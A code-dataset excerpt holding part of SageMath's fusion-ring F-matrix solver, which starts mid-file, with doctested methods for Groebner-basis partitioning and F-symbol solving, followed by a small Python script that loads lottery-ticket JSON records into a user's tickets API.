eq.variables()]\n            for x in s:\n                for y in s:\n                    if y != x:\n                        G.add_edge(x, y)\n        return G\n\n    def _partition_eqns(self, eqns=None, verbose=True):\n        r\"\"\"\n        Partition equations corresponding to edges in a disconnected graph.\n\n        OUTPUT:\n\n        This method returns a dictionary of ``(c, e)`` pairs, where\n        ``c`` is a tuple denoting a connected component in the graph produced\n        by calling :meth:`equations_graph` with the given ``eqns`` and\n        ``e`` is a list of all equations with variables in ``c``.\n\n        EXAMPLES::\n\n            sage: f = FusionRing(\"C2\", 1).get_fmatrix()\n            sage: f.get_defining_equations('hexagons', output=False)\n            sage: partition = f._partition_eqns()\n            Partitioned 11 equations into 5 components of size:\n            [4, 3, 3, 3, 1]\n            sage: from sage.algebras.fusion_rings.poly_tup_engine import variables\n            sage: for c, e in partition.items():\n            ....:     assert set(v for eq_tup in e for v in variables(eq_tup)) == set(c)\n            sage: vars_in_partition = set()\n            sage: eqns_in_partition = set()\n            sage: for c, e in partition.items():\n            ....:     vars_in_partition.update(c)\n            ....:     eqns_in_partition.update(e)\n            sage: vars_in_partition == set(v for eq_tup in f.ideal_basis for v in variables(eq_tup))\n            True\n            sage: eqns_in_partition == set(f.ideal_basis)\n            True\n            sage: from itertools import product\n            sage: for e1, e2 in product(partition.values(), repeat=2):\n            ....:     assert e1 == e2 or set(e1).isdisjoint(set(e2))\n        \"\"\"\n        if eqns is None:\n            eqns = self.ideal_basis\n        graph = self.equations_graph(eqns)\n        partition = {tuple(c): [] for c in graph.connected_components()}\n        for eq_tup in eqns:\n            partition[tuple(graph.connected_component_containing_vertex(variables(eq_tup)[0]))].append(eq_tup)\n        if verbose:\n            print(\"Partitioned {} equations into {} components of size:\".format(len(eqns), len(graph.connected_components())))\n            print(graph.connected_components_sizes())\n        return partition\n
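\n    # Added note: equations_graph, _partition_eqns and _par_graph_gb together\n    # implement the solver's divide-and-conquer step: the variable-interaction\n    # graph is typically highly disconnected, so a Groebner basis can be\n    # computed independently on each small connected component instead of on\n    # the full system at once.\n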
\n    def _par_graph_gb(self, eqns=None, term_order=\"degrevlex\", largest_comp=45, verbose=True):\n        r\"\"\"\n        Compute a Groebner basis for a list of equations partitioned\n        according to their corresponding graph.\n\n        .. NOTE::\n\n            If the graph has more than 50 components, this method computes the\n            Groebner basis in parallel when a ``worker_pool`` is provided.\n\n            This method will refuse to find a Groebner basis for a component\n            with more than ``largest_comp`` variables (45 by default), since\n            such a calculation does not seem to terminate; the corresponding\n            equations are passed through unchanged instead.\n\n        EXAMPLES::\n\n            sage: f = FusionRing(\"F4\", 1).get_fmatrix()\n            sage: f._reset_solver_state()\n            sage: f.get_orthogonality_constraints(output=False)\n            sage: f.start_worker_pool()\n            sage: f.get_defining_equations('hexagons', output=False)\n            sage: gb = f._par_graph_gb()\n            Partitioned 10 equations into 2 components of size:\n            [4, 1]\n            sage: from sage.algebras.fusion_rings.poly_tup_engine import _unflatten_coeffs\n            sage: ret = [f._tup_to_fpoly(_unflatten_coeffs(f.field(), t)) for t in gb]\n            sage: ret.sort(); ret\n            [fx4 + (-zeta80^24 + zeta80^16),\n             fx2 - fx3,\n             fx1 + (zeta80^24 - zeta80^16),\n             fx0 - 1,\n             fx3^2 + (zeta80^24 - zeta80^16)]\n            sage: f.shutdown_worker_pool()\n        \"\"\"\n        if eqns is None:\n            eqns = self.ideal_basis\n        small_comps = list()\n        temp_eqns = list()\n        for comp, comp_eqns in self._partition_eqns(eqns=eqns, verbose=verbose).items():\n            # Check if component is too large to process\n            if len(comp) > largest_comp:\n                temp_eqns.extend(comp_eqns)\n            else:\n                small_comps.append(comp_eqns)\n        input_iter = zip_longest(small_comps, [], fillvalue=term_order)\n        small_comp_gb = self._map_triv_reduce('compute_gb', input_iter, worker_pool=self.pool, chunksize=1, mp_thresh=50)\n        ret = small_comp_gb + temp_eqns\n        return ret\n\n    def _get_component_variety(self, var, eqns):\n        r\"\"\"\n        Translate equations in each connected component to smaller polynomial\n        rings so we can call the built-in variety method.\n\n        INPUT:\n\n        - ``var`` -- a list of variable indices\n        - ``eqns`` -- a list of polynomial equations in the internal\n          tuple of pairs representation\n\n        EXAMPLES::\n\n            sage: f = FusionRing(\"G2\", 2).get_fmatrix(new=True)\n            sage: f.start_worker_pool()\n            sage: f.get_defining_equations('hexagons', output=False) # long time\n            sage: f.shutdown_worker_pool()\n            sage: partition = f._partition_eqns() # long time\n            Partitioned 327 equations into 35 components of size:\n            [27, 27, 27, 24, 24, 16, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12,\n             9, 9, 6, 6, 4, 4, 4, 3, 3, 3, 3, 3, 3, 3, 3, 1, 1, 1, 1]\n            sage: c = (216, 292, 319)\n            sage: from sage.algebras.fusion_rings.poly_tup_engine import poly_to_tup\n            sage: eqns = partition[c] + [poly_to_tup(f._poly_ring.gen(216)-1)] # long time\n            sage: f._get_component_variety(c, eqns) # long time\n            [{216: -1, 292: -1, 319: 1}]\n        \"\"\"\n        # Define smaller poly ring in component vars\n        R = PolynomialRing(self._FR.field(), len(var), 'a', 
order='lex')\n\n # Zip tuples into R and compute Groebner basis\n idx_map = {old: new for new, old in enumerate(sorted(var))}\n nvars = len(var)\n eqns = [_unflatten_coeffs(self._field, eq_tup) for eq_tup in eqns]\n polys = [_tup_to_poly(resize(eq_tup, idx_map, nvars), parent=R) for eq_tup in eqns]\n var_in_R = Ideal(sorted(polys)).variety(ring=AA)\n\n # Change back to fmats poly ring and append to temp_eqns\n inv_idx_map = {v: k for k, v in idx_map.items()}\n return [{inv_idx_map[i]: value for i, (key, value) in enumerate(sorted(soln.items()))} for soln in var_in_R]\n\n #######################\n ### Solution method ###\n #######################\n\n # TODO: this can probably be improved by constructing a set of defining polynomials\n # and checking, one by one, if it's irreducible over the current field.\n # If it is, we construct an extension. Perhaps it's best to go one by one here...\n def attempt_number_field_computation(self):\n r\"\"\"\n Based on the ``CartanType`` of ``self`` and data\n known on March 17, 2021, determine whether to attempt\n to find a :func:`NumberField` containing all the F-symbols.\n\n This method is used by :meth:`find_orthogonal_solution`\n to determine a field containing all F-symbols.\n See :meth:`field` and :meth:`get_non_cyclotomic_roots`.\n\n For certain :class:`fusion rings `, the number field\n computation does not terminate in reasonable time.\n In these cases, we report F-symbols as elements\n of :class:`QQbar`.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"F4\", 2).get_fmatrix()\n sage: f.attempt_number_field_computation()\n False\n sage: f = FusionRing(\"G2\", 1).get_fmatrix()\n sage: f.attempt_number_field_computation()\n True\n\n .. NOTE::\n\n In certain cases, F-symbols are found in the associated\n :class:`FusionRing`'s cyclotomic field and a\n :func:`NumberField` computation is not needed. In these\n cases this method returns ``True`` but the\n :meth:`find_orthogonal_solution` solver does *not*\n undertake a :func:`NumberField` computation.\n \"\"\"\n ct = self._FR.cartan_type()\n k = self._FR._k\n # Don't try when k is large and odd for SU(2)_k\n if ct.letter == 'A':\n if ct.n == 1 and k >= 9 and k % 2:\n return False\n if ct.letter == 'C':\n if ct.n >= 9 and ct.n % 2 and k == 1:\n return False\n if ct.letter == 'E':\n if ct.n < 8 and k == 2:\n return False\n if ct.n == 8 and k == 3:\n return False\n if ct.letter == 'F' and k == 2:\n return False\n if ct.letter == 'G' and k == 2:\n return False\n return True\n\n def _get_explicit_solution(self, eqns=None, verbose=True):\n r\"\"\"\n Construct an explicit solution of ``self``.\n\n When this method is called, the solution is already found in\n terms of a Groebner basis. A few degrees of freedom remain.\n By specializing the free variables and back substituting, a\n solution in the base field is now obtained.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"A1\", 3).get_fmatrix() # indirect doctest\n sage: f.find_orthogonal_solution() # long time\n Computing F-symbols for The Fusion Ring of Type A1 and level 3 with Integer Ring coefficients with 71 variables...\n Set up 134 hex and orthogonality constraints...\n Partitioned 134 equations into 17 components of size:\n [12, 12, 6, 6, 4, 4, 3, 3, 3, 3, 3, 3, 3, 3, 1, 1, 1]\n Elimination epoch completed... 10 eqns remain in ideal basis\n Elimination epoch completed... 0 eqns remain in ideal basis\n Hex elim step solved for 51 / 71 variables\n Set up 121 reduced pentagons...\n Elimination epoch completed... 
18 eqns remain in ideal basis\n Elimination epoch completed... 5 eqns remain in ideal basis\n Pent elim step solved for 64 / 71 variables\n Partitioned 5 equations into 1 components of size:\n [4]\n Elimination epoch completed... 0 eqns remain in ideal basis\n Partitioned 6 equations into 6 components of size:\n [1, 1, 1, 1, 1, 1]\n Computing appropriate NumberField...\n \"\"\"\n if eqns is None:\n eqns = self.ideal_basis\n # Don't add square fixers when warm starting from a late-stage checkpoint\n if self._chkpt_status < 5:\n n = self._poly_ring.ngens()\n one = self._field.one()\n for fx, rhs in self._ks.items():\n if not self._solved[fx]:\n lt = (ETuple({fx: 2}, n), one)\n eqns.append(((lt, (ETuple({}, n), -rhs))))\n eqns_partition = self._partition_eqns(verbose=verbose)\n\n F = self._field\n R = F['x']\n numeric_fvars = dict()\n non_cyclotomic_roots = list()\n must_change_base_field = False\n phi = F.hom([F.gen()], F)\n for comp, part in eqns_partition.items():\n # If component has only one equation in a single variable, get a root\n if len(comp) == 1 and len(part) == 1:\n # Attempt to find cyclotomic root\n univ_poly = tup_to_univ_poly(part[0], R)\n roots = univ_poly.roots(multiplicities=False)\n if roots:\n numeric_fvars[comp[0]] = roots[0]\n else:\n # A real solution is preferred\n roots = univ_poly.roots(ring=AA, multiplicities=False)\n if not roots:\n roots = univ_poly.roots(ring=QQbar, multiplicities=False)\n non_cyclotomic_roots.append((comp[0], roots[0]))\n must_change_base_field = True\n # Otherwise, compute the component variety and select a point to obtain a numerical solution\n else:\n sols = self._get_component_variety(comp, part)\n for fx, rhs in sols[0].items():\n non_cyclotomic_roots.append((fx, rhs))\n must_change_base_field = True\n\n if must_change_base_field:\n # Attempt to compute smallest number field containing all the F-symbols\n # If calculation takes too long, we use QQbar as the base field\n if self.attempt_number_field_computation():\n if verbose:\n print(\"Computing appropriate NumberField...\")\n roots = [self._FR.field().gen()]+[r[1] for r in non_cyclotomic_roots]\n self._field, bf_elts, self._qqbar_embedding = number_field_elements_from_algebraics(roots, minimal=True)\n else:\n self._field = QQbar\n bf_elts = [self._qqbar_embedding(F.gen())]\n bf_elts += [rhs for fx, rhs in non_cyclotomic_roots]\n self._qqbar_embedding = lambda x : x\n self._non_cyc_roots = bf_elts[1:]\n\n # Embed cyclotomic field into newly constructed base field\n cyc_gen_as_bf_elt = bf_elts.pop(0)\n phi = self._FR.field().hom([cyc_gen_as_bf_elt], self._field)\n self._coerce_map_from_cyc_field = phi\n numeric_fvars = {k : phi(v) for k, v in numeric_fvars.items()}\n for i, elt in enumerate(bf_elts):\n numeric_fvars[non_cyclotomic_roots[i][0]] = elt\n # Update polynomial ring\n self._poly_ring = self._poly_ring.change_ring(self._field)\n\n # Ensure all F-symbols are known\n for fx in numeric_fvars:\n self._solved[fx] = True\n nvars = self._poly_ring.ngens()\n assert sum(self._solved) == nvars, \"Some F-symbols are still missing...{}\".format([self._poly_ring.gen(fx) for fx in range(nvars) if not self._solved[fx]])\n\n # Backward substitution step. Traverse variables in reverse lexicographical order. 
(System is in triangular form)\n self._fvars = {sextuple: apply_coeff_map(rhs, phi) for sextuple, rhs in self._fvars.items()}\n for fx, rhs in numeric_fvars.items():\n self._fvars[self._idx_to_sextuple[fx]] = ((ETuple({}, nvars), rhs), )\n _backward_subs(self, flatten=False)\n self._fvars = {sextuple: constant_coeff(rhs, self._field) for sextuple, rhs in self._fvars.items()}\n\n # Update base field attributes\n self._FR._field = self.field()\n self._FR._basecoer = self.get_coerce_map_from_fr_cyclotomic_field()\n if self._FR._basecoer:\n self._FR.r_matrix.clear_cache()\n\n def find_orthogonal_solution(self, checkpoint=False, save_results=\"\", warm_start=\"\", use_mp=True, verbose=True):\n r\"\"\"\n Solve the hexagon and pentagon relations, along with\n orthogonality constraints, to evaluate an orthogonal F-matrix.\n\n INPUT:\n\n - ``checkpoint`` -- (default: ``False``) a boolean indicating whether\n the computation should be checkpointed. Depending on the associated\n ``CartanType``, the computation may take hours to complete. For\n large examples, checkpoints are recommended. This method supports\n \"warm\" starting, so the calculation may be resumed from a checkpoint,\n using the ``warm_start`` option.\n\n Checkpoints store necessary state in the pickle file\n ``\"fmatrix_solver_checkpoint_\" + key + \".pickle\"``, where ``key``\n is the result of :meth:`get_fr_str`.\n\n Checkpoint pickles are automatically deleted when the solver exits\n a successful run.\n\n - ``save_results`` -- (optional) a string indicating the name of a\n pickle file in which to store calculated F-symbols for later use.\n\n If ``save_results`` is not provided (default), F-matrix results\n are not stored to file.\n\n The F-symbols may be saved to file after running the solver using\n :meth:`save_fvars`.\n\n - ``warm_start`` -- (optional) a string indicating the name of a pickle\n file containing checkpointed solver state. This file must have been\n produced by a previous call to the solver using the ``checkpoint``\n option.\n\n If no file name is provided, the calculation begins from scratch.\n\n - ``use_mp`` -- (default: ``True``) a boolean indicating whether to use\n multiprocessing to speed up calculation. The default value\n ``True`` is highly recommended, since parallel processing yields\n results much more quickly.\n\n - ``verbose`` -- (default: ``True``) a boolean indicating whether the\n solver should print out intermediate progress reports.\n\n OUTPUT:\n\n This method returns ``None``. If the solver runs successfully, the\n results may be accessed through various methods, such as\n :meth:`get_fvars`, :meth:`fmatrix`, :meth:`fmat`, etc.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"B5\", 1).get_fmatrix(fusion_label=\"b\", inject_variables=True)\n creating variables fx1..fx14\n Defining fx0, fx1, fx2, fx3, fx4, fx5, fx6, fx7, fx8, fx9, fx10, fx11, fx12, fx13\n sage: f.find_orthogonal_solution()\n Computing F-symbols for The Fusion Ring of Type B5 and level 1 with Integer Ring coefficients with 14 variables...\n Set up 25 hex and orthogonality constraints...\n Partitioned 25 equations into 5 components of size:\n [4, 3, 3, 3, 1]\n Elimination epoch completed... 0 eqns remain in ideal basis\n Hex elim step solved for 10 / 14 variables\n Set up 7 reduced pentagons...\n Elimination epoch completed... 
0 eqns remain in ideal basis\n Pent elim step solved for 12 / 14 variables\n Partitioned 0 equations into 0 components of size:\n []\n Partitioned 2 equations into 2 components of size:\n [1, 1]\n sage: f.fmatrix(b2, b2, b2, b2)\n [ 1/2*zeta80^30 - 1/2*zeta80^10 -1/2*zeta80^30 + 1/2*zeta80^10]\n [ 1/2*zeta80^30 - 1/2*zeta80^10 1/2*zeta80^30 - 1/2*zeta80^10]\n sage: f.fmat(b2, b2, b2, b2, b0, b1)\n -1/2*zeta80^30 + 1/2*zeta80^10\n\n Every F-matrix `F^{a, b, c}_d` is orthogonal and in many cases real.\n We may use :meth:`fmats_are_orthogonal` and :meth:`fvars_are_real`\n to obtain correctness certificates.\n\n EXAMPLES::\n\n sage: f.fmats_are_orthogonal()\n True\n\n In any case, the F-symbols are obtained as elements of the associated\n :class:`FusionRing`'s\n :class:`Cyclotomic field`,\n a computed :func:`NumberField`, or :class:`QQbar`.\n Currently, the field containing the F-symbols is determined based\n on the ``CartanType`` associated to ``self``.\n\n .. SEEALSO::\n\n :meth:`attempt_number_field_computation`\n \"\"\"\n if self._poly_ring.ngens() == 0:\n return\n self._reset_solver_state()\n\n # Resume computation from checkpoint\n if warm_start:\n self._restore_state(warm_start)\n # Loading from a pickle with solved F-symbols\n if self._chkpt_status > 5:\n return\n if use_mp:\n self.start_worker_pool()\n if verbose:\n print(\"Computing F-symbols for {} with {} variables...\".format(self._FR, self._poly_ring.ngens()))\n\n if self._chkpt_status < 1:\n # Set up hexagon equations and orthogonality constraints\n self.get_orthogonality_constraints(output=False)\n self.get_defining_equations('hexagons', output=False)\n # Report progress\n if verbose:\n print(\"Set up {} hex and orthogonality constraints...\".format(len(self.ideal_basis)))\n\n # Unzip _fvars and link to shared_memory structure if using multiprocessing\n if use_mp:# and loads_shared_memory:\n self._fvars = self._shared_fvars\n else:\n n = self._poly_ring.ngens()\n self._fvars = FvarsHandler(n, self._field, self._idx_to_sextuple, init_data=self._fvars)\n self._checkpoint(checkpoint, 1, verbose=verbose)\n\n if self._chkpt_status < 2:\n # Set up equations graph. Find GB for each component in parallel. 
Eliminate variables\n self.ideal_basis = self._par_graph_gb(verbose=verbose)\n self.ideal_basis.sort(key=poly_tup_sortkey)\n self._triangular_elim(verbose=verbose)\n # Report progress\n if verbose:\n print(\"Hex elim step solved for {} / {} variables\".format(sum(self._solved), len(self._poly_ring.gens())))\n self._checkpoint(checkpoint, 2, verbose=verbose)\n\n if self._chkpt_status < 3:\n # Set up pentagon equations in parallel\n self.get_defining_equations('pentagons', output=False)\n # Report progress\n if verbose:\n print(\"Set up {} reduced pentagons...\".format(len(self.ideal_basis)))\n self._checkpoint(checkpoint, 3, verbose=verbose)\n\n if self._chkpt_status < 4:\n # Simplify and eliminate variables\n self.ideal_basis.sort(key=poly_tup_sortkey)\n self._triangular_elim(verbose=verbose)\n # Report progress\n if verbose:\n print(\"Pent elim step solved for {} / {} variables\".format(sum(self._solved), len(self._poly_ring.gens())))\n self._checkpoint(checkpoint, 4, verbose=verbose)\n\n # Try adding degrevlex gb -> elim loop until len(ideal_basis) does not change\n\n # Set up new equations graph and compute variety for each component\n if self._chkpt_status < 5:\n self.ideal_basis = self._par_graph_gb(term_order=\"lex\", verbose=verbose)\n self.ideal_basis.sort(key=poly_tup_sortkey)\n self._triangular_elim(verbose=verbose)\n self._checkpoint(checkpoint, 5, verbose=verbose)\n self.shutdown_worker_pool()\n\n # Find numeric values for each F-symbol\n self._get_explicit_solution(verbose=verbose)\n # The calculation was successful, so we may delete checkpoints\n self._chkpt_status = 7\n self.clear_equations()\n if checkpoint:\n remove(\"fmatrix_solver_checkpoint_\"+self.get_fr_str()+\".pickle\")\n if save_results:\n self.save_fvars(save_results)\n\n #########################\n ### Cyclotomic method ###\n #########################\n\n def _fix_gauge(self, algorithm=\"\"):\n r\"\"\"\n Fix the gauge by forcing F-symbols not already fixed to equal `1`.\n\n .. NOTE::\n\n This method should be used *after* adding hexagon and pentagon\n equations to ``self.ideal_basis``.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"A3\", 1).get_fmatrix()\n sage: f._reset_solver_state() # long time\n sage: f._var_to_sextuple = {f._poly_ring.gen(i): s for i, s in f._idx_to_sextuple.items()} # long time\n sage: eqns = f.get_defining_equations(\"hexagons\")+f.get_defining_equations(\"pentagons\") # long time\n sage: f.ideal_basis = set(Ideal(eqns).groebner_basis()) # long time\n sage: _, _ = f._substitute_degree_one() # long time\n sage: f._fix_gauge() # long time\n adding equation... fx1 - 1\n adding equation... fx18 - 1\n adding equation... 
fx21 - 1\n \"\"\"\n while not all(v for v in self._solved):\n # Get a variable that has not been fixed\n # In ascending index order, for consistent results\n for i, var in enumerate(self._poly_ring.gens()):\n if not self._solved[i]:\n break\n\n # Fix var = 1, substitute, and solve equations\n self.ideal_basis.add(var-1)\n print(\"adding equation...\", var-1)\n self.ideal_basis = set(Ideal(list(self.ideal_basis)).groebner_basis(algorithm=algorithm))\n self._substitute_degree_one()\n self._update_equations()\n\n def _substitute_degree_one(self, eqns=None):\n r\"\"\"\n Substitute known value from linear univariate polynomial and\n solve, following [Bond2007]_ p.37, for two-term linear equation\n for one of the variables.\n\n EXAMPLES::\n\n sage: fr = FusionRing(\"D3\", 1)\n sage: f = fr.get_fmatrix(inject_variables=True, new=True)\n creating variables fx1..fx27\n Defining fx0, ..., fx26\n sage: f._reset_solver_state()\n sage: f._var_to_sextuple = {f._poly_ring.gen(i): s for i, s in f._idx_to_sextuple.items()}\n sage: f.ideal_basis = [fx0 - 8, fx4**2 - 3, fx4 + fx10 + 3, fx4 + fx9]\n sage: _, _ = f._substitute_degree_one()\n sage: f._fvars[f._var_to_sextuple[fx0]]\n 8\n sage: f._fvars[f._var_to_sextuple[fx4]]\n -fx9\n \"\"\"\n if eqns is None:\n eqns = self.ideal_basis\n\n new_knowns = set()\n useless = set()\n for eq in eqns:\n if eq.degree() == 1 and sum(eq.degrees()) <= 2 and eq.lm() not in self._solved:\n self._fvars[self._var_to_sextuple[eq.lm()]] = -sum(c * m for c, m in zip(eq.coefficients()[1:], eq.monomials()[1:])) / eq.lc()\n # Add variable to set of known values and remove this equation\n new_knowns.add(eq.lm())\n useless.add(eq)\n\n # Update fvars depending on other variables\n for idx, fx in enumerate(self._poly_ring.gens()):\n if fx in new_knowns:\n self._solved[idx] = fx\n for sextuple, rhs in self._fvars.items():\n d = {var: self._fvars[self._var_to_sextuple[var]] for var in rhs.variables() if var in self._solved}\n if d:\n self._fvars[sextuple] = rhs.subs(d)\n return new_knowns, useless\n\n def _update_equations(self):\n r\"\"\"\n Perform backward substitution on equations in ``self.ideal_basis``.\n\n EXAMPLES::\n\n sage: fr = FusionRing(\"D3\", 1)\n sage: f = fr.get_fmatrix(inject_variables=True, new=True)\n creating variables fx1..fx27\n Defining fx0, ..., fx26\n sage: f._reset_solver_state()\n sage: f._var_to_sextuple = {f._poly_ring.gen(i): s for i, s in f._idx_to_sextuple.items()}\n sage: f.ideal_basis = [fx0 - 8, fx4 + fx9, fx4**2 + fx3 - fx9**2]\n sage: _, _ = f._substitute_degree_one()\n sage: f._update_equations()\n sage: f.ideal_basis\n {fx3}\n \"\"\"\n special_values = {known: self._fvars[self._var_to_sextuple[known]] for known in self._solved if known}\n self.ideal_basis = set(eq.subs(special_values) for eq in self.ideal_basis)\n self.ideal_basis.discard(0)\n\n def find_cyclotomic_solution(self, equations=None, algorithm=\"\", verbose=True, output=False):\n r\"\"\"\n Solve the hexagon and pentagon relations to evaluate the F-matrix.\n\n This method (omitting the orthogonality constraints) produces\n output in the cyclotomic field, but it is very limited in the size\n of examples it can handle: for example, `G_2` at level 2 is\n too large for this method. 
You may use :meth:`find_orthogonal_solution`\n to solve much larger examples.\n\n INPUT:\n\n - ``equations`` -- (optional) a set of equations to be\n solved; defaults to the hexagon and pentagon equations\n - ``algorithm`` -- (optional) algorithm to compute Groebner Basis\n - ``output`` -- (default: ``False``) output a dictionary of\n F-matrix values; this may be useful to see but may be omitted\n since this information will be available afterwards via the\n :meth:`fmatrix` and :meth:`fmat` methods.\n\n EXAMPLES::\n\n sage: fr = FusionRing(\"A2\", 1, fusion_labels=\"a\", inject_variables=True)\n sage: f = fr.get_fmatrix(inject_variables=True)\n creating variables fx1..fx8\n Defining fx0, fx1, fx2, fx3, fx4, fx5, fx6, fx7\n sage: f.find_cyclotomic_solution(output=True)\n Setting up hexagons and pentagons...\n Finding a Groebner basis...\n Solving...\n Fixing the gauge...\n adding equation... fx4 - 1\n Done!\n {(a2, a2, a2, a0, a1, a1): 1,\n (a2, a2, a1, a2, a1, a0): 1,\n (a2, a1, a2, a2, a0, a0): 1,\n (a2, a1, a1, a1, a0, a2): 1,\n (a1, a2, a2, a2, a0, a1): 1,\n (a1, a2, a1, a1, a0, a0): 1,\n (a1, a1, a2, a1, a2, a0): 1,\n (a1, a1, a1, a0, a2, a2): 1}\n\n After you successfully run :meth:`find_cyclotomic_solution` you may\n check the correctness of the F-matrix by running\n :meth:`get_defining_equations` with ``option='hexagons'`` and\n ``option='pentagons'``. These should return empty lists\n of equations.\n\n EXAMPLES::\n\n sage: f.get_defining_equations(\"hexagons\")\n []\n sage: f.get_defining_equations(\"pentagons\")\n []\n \"\"\"\n if self._poly_ring.ngens() == 0:\n return\n self._reset_solver_state()\n self._var_to_sextuple = {self._poly_ring.gen(i): s for i, s in self._idx_to_sextuple.items()}\n\n if equations is None:\n if verbose:\n print(\"Setting up hexagons and pentagons...\")\n equations = self.get_defining_equations(\"hexagons\")+self.get_defining_equations(\"pentagons\")\n if verbose:\n print(\"Finding a Groebner basis...\")\n self.ideal_basis = set(Ideal(equations).groebner_basis(algorithm=algorithm))\n if verbose:\n print(\"Solving...\")\n self._substitute_degree_one()\n if verbose:\n print(\"Fixing the gauge...\")\n self._fix_gauge(algorithm=algorithm)\n if verbose:\n print(\"Done!\")\n if output:\n return self._fvars\n\n #####################\n ### Verifications ###\n #####################\n\n def fmats_are_orthogonal(self):\n r\"\"\"\n Verify that all F-matrices are orthogonal.\n\n This method should always return ``True`` when called after running\n :meth:`find_orthogonal_solution`.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"D4\", 1).get_fmatrix()\n sage: f.find_orthogonal_solution(verbose=False)\n sage: f.fmats_are_orthogonal()\n True\n \"\"\"\n is_orthog = []\n for a, b, c, d in product(self._FR.basis(), repeat=4):\n mat = self.fmatrix(a, b, c, d)\n is_orthog.append(mat.T * mat == matrix.identity(mat.nrows()))\n return all(is_orthog)\n\n def fvars_are_real(self):\n r\"\"\"\n Test whether all F-symbols are real.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"A1\", 3).get_fmatrix()\n sage: f.find_orthogonal_solution(verbose=False) # long time\n sage: f.fvars_are_real() # not tested (cypari issue in doctesting framework)\n True\n \"\"\"\n try:\n for k, v in self._fvars.items():\n AA(self._qqbar_embedding(v))\n except ValueError:\n print(\"the F-symbol {} (key {}) has a nonzero imaginary part\".format(v, k))\n return False\n return True\n\n def certify_pentagons(self, use_mp=True, verbose=False):\n r\"\"\"\n Obtain a certificate of satisfaction for the pentagon equations,\n up 
to floating-point error.\n\n This method converts the computed F-symbols (available through\n :meth:`get_fvars`) to native Python floats and then checks whether\n the pentagon equations are satisfied using floating point arithmetic.\n\n When ``self.FR().basis()`` has many elements, verifying satisfaction\n of the pentagon relations exactly using :meth:`get_defining_equations`\n with ``option=\"pentagons\"`` may take a long time. This method is\n faster, but it cannot provide mathematical guarantees.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"C3\", 1).get_fmatrix()\n sage: f.find_orthogonal_solution() # long time\n Computing F-symbols for The Fusion Ring of Type C3 and level 1 with Integer Ring coefficients with 71 variables...\n Set up 134 hex and orthogonality constraints...\n Partitioned 134 equations into 17 components of size:\n [12, 12, 6, 6, 4, 4, 3, 3, 3, 3, 3, 3, 3, 3, 1, 1, 1]\n Elimination epoch completed... 10 eqns remain in ideal basis\n Elimination epoch completed... 0 eqns remain in ideal basis\n Hex elim step solved for 51 / 71 variables\n Set up 121 reduced pentagons...\n Elimination epoch completed... 18 eqns remain in ideal basis\n Elimination epoch completed... 5 eqns remain in ideal basis\n Pent elim step solved for 64 / 71 variables\n Partitioned 5 equations into 1 components of size:\n [4]\n Elimination epoch completed... 0 eqns remain in ideal basis\n Partitioned 6 equations into 6 components of size:\n [1, 1, 1, 1, 1, 1]\n Computing appropriate NumberField...\n sage: f.certify_pentagons() is None # not tested (long time ~1.5s, cypari issue in doctesting framework)\n True\n \"\"\"\n fvars_copy = deepcopy(self._fvars)\n self._fvars = {sextuple: float(rhs) for sextuple, rhs in self.get_fvars_in_alg_field().items()}\n if use_mp:\n pool = Pool()\n else:\n pool = None\n n_proc = pool._processes if pool is not None else 1\n params = [(child_id, n_proc, verbose) for child_id in range(n_proc)]\n pe = self._map_triv_reduce('pent_verify', params, worker_pool=pool, chunksize=1, mp_thresh=0)\n if np.all(np.isclose(np.array(pe), 0, atol=1e-7)):\n if verbose:\n print(\"Found valid F-symbols for {}\".format(self._FR))\n pe = None\n else:\n if verbose:\n print(\"Something went wrong. Pentagons remain.\")\n self._fvars = fvars_copy\n return pe\n","repo_name":"sagemath/sage-archive-2023-02-01","sub_path":"src/sage/algebras/fusion_rings/f_matrix.py","file_name":"f_matrix.py","file_ext":"py","file_size_in_byte":100973,"program_lang":"python","lang":"en","doc_type":"code","stars":2037,"dataset":"github-code","pt":"40"}
+{"seq_id":"25931950620","text":"#!/usr/local/bin/python3\n\n'''usage: load_tickets_api.py [-h] --file-path FILE_PATH --api-url API_URL --access-token ACCESS_TOKEN\n\nLoad a JSON export of Tickets into Tickets table via the tickets API. 
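A typical invocation might look like this (illustrative values only, not taken from the original project):\n\n python load_tickets_api.py --file-path tickets.json --api-url https://example.execute-api.us-east-1.amazonaws.com/prod --access-token $ACCESS_TOKEN\n\n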
The tickets will be stored as the cognito user (token) who runs this.\n\noptional arguments:\n -h, --help show this help message and exit\n --file-path FILE_PATH\n File path to json export of Ticket items.\n --api-url API_URL\n --access-token ACCESS_TOKEN\n '''\n\nimport json\nfrom argparse import ArgumentParser\n\nimport requests\n\n\ndef main(file_path: str, api_url: str, access_token: str):\n api_url += '/tickets'\n tickets = json.load(open(file_path))\n for ticket in tickets:\n ticket['startDate'], ticket['endDate'] = ticket['DateRange'].split('#')[:2]\n ticket['picks'] = ticket['Picks']\n\n all_tickets = list_tickets(api_url, access_token)\n print(f'Total tickets in DB: {len(all_tickets)}')\n\n for ticket in tickets:\n resp = put_ticket(ticket, api_url, access_token)\n resp.raise_for_status()\n print(resp)\n\n all_tickets = list_tickets(api_url, access_token)\n print(f'Total tickets in DB: {len(all_tickets)}')\n\n\ndef put_ticket(ticket: dict, api_url, access_token) -> requests.Response:\n\n resp = requests.put(\n api_url,\n headers={'Authorization': f'Bearer {access_token}'},\n json=ticket\n )\n return resp\n\n\ndef list_tickets(api_url, access_token):\n resp = requests.get(\n api_url,\n headers={'Authorization': f'Bearer {access_token}'})\n resp.raise_for_status()\n return resp.json()\n\n\nif __name__ == '__main__':\n parser = ArgumentParser(\n description='Load a JSON export of Tickets into Tickets table via the tickets API. The tickets will be stored as the cognito user (token) who runs this.')\n parser.add_argument('--file-path', required=True,\n help=\"File path to json export of Ticket items.\")\n parser.add_argument('--api-url', required=True)\n parser.add_argument('--access-token', required=True)\n args = parser.parse_args()\n main(args.file_path, args.api_url, args.access_token)\n","repo_name":"puremcc/lottochecker","sub_path":"backend/util/load_tickets_api.py","file_name":"load_tickets_api.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
